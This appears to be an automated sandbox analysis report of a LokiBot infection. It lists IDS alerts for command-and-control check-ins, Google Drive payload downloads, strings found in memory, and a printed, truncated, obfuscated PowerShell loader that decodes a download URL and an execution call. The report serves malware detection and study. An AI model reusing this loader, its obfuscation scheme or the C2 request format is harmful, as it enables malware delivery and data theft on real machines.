                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49750 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49753 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49769 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49764 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49768 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49766 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49767 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49765 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49765 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49765 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49765 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49751 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 137.184.191.215:80
                Source: Joe Sandbox View, IP Address: 137.184.191.215
                Source: Joe Sandbox View, ASN Name: PANDGUS
                Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49738 -> 142.250.185.206:443
                Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: GET /download?id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.usercontent.google.com | Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /download?id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: POST /index.php/039 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 137.184.191.215 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 589BD15E | Content-Length: 176 | Connection: close
                Source: global traffic, HTTP traffic detected: POST /index.php/039 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 137.184.191.215 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 589BD15E | Content-Length: 149 | Connection: close
                Source: unknown, TCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: global traffic, DNS traffic detected: DNS query: drive.google.com
                Source: global traffic, DNS traffic detected: DNS query: drive.usercontent.google.com
                Source: unknown, HTTP traffic detected: POST /index.php/039 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 137.184.191.215 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 589BD15E | Content-Length: 176 | Connection: close
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA4857B000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://drive.google.com
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA485B4000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://drive.usercontent.google.com
                Source: powershell.exe, 00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2683653620.0000000004E41000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46921000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000003.00000002.2683653620.0000000004E41000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://apis.google.com
                Source: powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA48576000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://drive.googP
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA484CB000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://drive.google.com
                Source: msiexec.exe, 00000008.00000002.3013626741.0000000008780000.00000004.00001000.00020000.00000000.sdmp, String found in binary or memory: https://drive.google.com/uc?export=download&id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46B48000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://drive.google.com/uc?export=download&id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAbP
                Source: powershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://drive.google.com/uc?export=download&id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAbXR%l(
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://drive.usercontent.googh
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46DB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://drive.usercontent.google.com
                Source: msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://drive.usercontent.google.com/Db
                Source: msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://drive.usercontent.google.com/download?id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy&export=download
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46DB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://drive.usercontent.google.com/download?id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb&export=download
                Source: msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://drive.usercontent.google.com/pb
                Source: powershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA47507000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://go.micro
                Source: powershell.exe, 00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://ssl.gstatic.com
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA4859D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://www.google-analytics.com;report-uri
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://www.google.com
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA4859D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://www.googletagmanager.com
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA4859D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://www.gstatic.com
                Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknown, Network traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknown, Network traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknown, Network traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknown, Network traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknown, HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49739 version: TLS 1.2

                System Summary

                Source: amsi32_4348.amsi.csv, type: OTHER, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 4348, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
                Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl 
